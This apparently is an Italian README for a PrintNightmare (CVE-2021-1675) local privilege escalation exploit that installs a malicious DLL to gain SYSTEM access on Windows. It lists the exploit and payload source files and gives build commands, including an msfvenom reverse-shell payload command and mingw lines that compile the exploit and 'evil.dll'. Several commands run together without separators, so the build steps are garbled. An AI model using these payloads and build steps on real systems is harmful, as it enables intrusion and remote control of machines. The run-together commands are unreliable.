
Elevazione dei privilegi locale per CVE-2021-1675 (PrintNightmare) che installa una DLL dannosa per ottenere accesso SYSTEM su sistemi Windows vulnerabili.
src/nightmare.cpp: codice sorgente per sfruttare CVE-2021-1675 e ottenere accesso di sistema
installando una dll dannosa
src/payload-dll.cpp: codice sorgente per la dll con shellcode dannoso nella funzione di ingresso
!!Utilizzare solo su server su cui hai il permesso di testare
CVE-2021-1675 è una vulnerabilità nel servizio Print Spooler di Microsoft Windows che consente a un attaccante di bypassare il controllo SeLoadDriverPrivilege. Questo può essere sfruttato per ottenere un'escalation dei privilegi sulla macchina target installando una DLL dannosa che chiama shellcode o utilizza l'API di Windows per stabilire una connessione reverse shell. Le versioni di Windows 10/8/Server 2008/Server 2012 precedenti all'8 giugno 2021 sono interessate.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/